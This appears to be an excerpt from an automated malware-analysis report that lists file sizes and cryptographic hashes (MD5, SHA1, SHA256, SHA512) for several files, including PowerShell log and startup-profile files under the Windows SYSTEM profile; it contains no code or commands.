MD58ba2df825e0e2a6f0949957ef62adb85
SHA16bfee0f086ce8665a56cc77c507ebb0922999100
SHA256572e1f50be59c2be0aee259dd2e8a78b43ea1b8ab3cf2ebb96e91c65e52e7bd7
SHA5126b72f2a02f165912ec202a2a53bd3efbb4d333eadec4c5caba9ef8c9e3edafbddf50681fee3451bf72702e331ee572a3aab3863908def60185b43f417e054881
-
Filesize
482KB
MD52909c56a880d330c8abaa8bc1f2f5f42
SHA12fae089fa66823e9d179233ba94bc483f2f3707c
SHA256bbe665c3997fb848652b74071e7e07def0c924a4aaa390dfbe28bcffe2c69f94
SHA51296dee8dc12c697c1b725c5cf84a1bb72977d75801e5f4c9e4447fde13453867242edd5bc26a1121430a2d3321c2e942bdd8b5b38a31ce61e7867c09c29b35e27
-
Filesize
232KB
MD5660e651afaf886874630b448053f7eed
SHA116d69ad4c4afb92a736184ac07503cc94f1747e0
SHA256bda4752c6778acad96b33405a5771c20c7eb054fe5b73bb23ba3342fa4721140
SHA51232793bf234a9a1b3dcd02c3645c4173ad84058a3f1a99ca82a3e30b61ba86c682202a0acda9d0d479e0824eebf23f0bae1e82f504ca36e91dd730fa2abfab16b
-
Filesize
7KB
MD55b423612b36cde7f2745455c5dd82577
SHA10187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c
-
Filesize
369KB
MD5d641a8c632aa4b393491a9bd2a1407e3
SHA1808947f3c5545219bb45ac931e96cbec672e620b
SHA25639415ee7b412df72b4ee1109ba32e987904734c3cfbffa6bcb6b579415449dba
SHA512819c323ec2487a4f4de75421ec7e1cdc4668ac2fe9422bd633d6e20430f656dd352dbf2b279dac37ed30301568c51640252c7035774b440558248a76a731f183
-
Filesize
4KB
MD5049a1ba3ca34916b7484fbb3cb6c6058
SHA11ba0d5283b4f77979a68c161a29bf72cba5c5a91
SHA256bef7a889d90e137733d4d4e4b67dd8aef395b3dcff7cdfd907790ffa0bdee1cb
SHA51293e86b3d0912e1784525f40789abb4b40f46b60609b9b804d4908bb37630865ea83ba4ce1be6482c55234e51657dd526b00e7bf493f6809c8373ba042b047bee
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize19KB
MD546388ea3887f5817762bae9bd163e4a6
SHA19fac3bff795d16f3fdbb2d701f62bdabe28d420c
SHA256495722a219f2c422c9b6ed5b68d19c92a91e5a299d9d247a482206169158b63b
SHA512a99da7bbf85f4cdd6ba2d58749f7d996d42b6089e1d7d63e5bc9896864de5f1d6bea6313fd15dcc4e4ac692c3d5ff330f6486d25551fb0a32d10775e11803690
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize19KB
MD5f0fbbc191622a86ea98cadf3b7bc8c11
SHA1d62f0830fb30c896f79bbe0ff1118836d5885b40
SHA256bd2736ad5d806d160f00491d194b6da8130b382a309c6e469a487b0cb56942a7
SHA51237257c2ef2f65b30e5d9cbe0d4474e4c81a957f6617d100431d3e185f0b2e137b01c5d9977319f07500cb934c87b56fc0e1dd9c214d6f334542408aff157604e
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize19KB
MD5da96c2bb208aa1cafe955c1773340944
SHA1a944375219924d3d458144fbfa1876a87f205221
SHA2569dea5f54a6974996dfb01e5a3c2413dda884bed8899b5deb141b454d653bd75a
SHA512382d399ae1da4538660976ce88fcf2151d87ccd76fa1872bab7373795d26ef998a99a4d020cc3c5b3a4f0c7a4a53f8fadfd599d4a984447b3e8681f0ddda572b
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5ad348487e1678e942b683318480492fc
SHA1d2eda54fea48a15473964164b6a5b23d4d6a723a
SHA2562aa78be8d06ef17507eb90c39eb48db3f957194be1b7b28bb12fba7b5c8f33e4
SHA512984d74fef4a6d0ffbf22ece341827b6cb669795b2db881d23a8f883ae5d2404175acf8b6e18b584c03d5d3a3c0e398582d2622e1195aa0c1913a200465e412a7
-
Filesize
465KB
MD586381cf4a003cc94958483acf132423f
SHA1aab73352ce36c7f7eec87429da86ec0014e7e3af
SHA2563ae8f51a46e606241089366c9af3ddda685a89254db11099b5056fdd6fe43f76
SHA51234b0a9af2f962d6d1b85d8b370cb6a3ac5328ab824846f359f42fbbb857cd905cc87576158cf520b2314ca2754684836390afcc1d7af7c94905fa8b58d5f1341
-
Filesize
657KB
MD54e1b7535185ee759a4c093fd184e1c48
SHA103c250f60f742c8156b28698841fe1b930f9e861
SHA256934f4d43301844fd304248cde860933628f14bf55d270c0261736fd26672be27
SHA512b5b16c995ec42d9a9af95f906203e0aa7c6f27f32eab82008f00b85fa583f7466f3a72695a80d5ae42e0ed841fa24eaf62624cfeca7c287752a969f937b29ca3
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732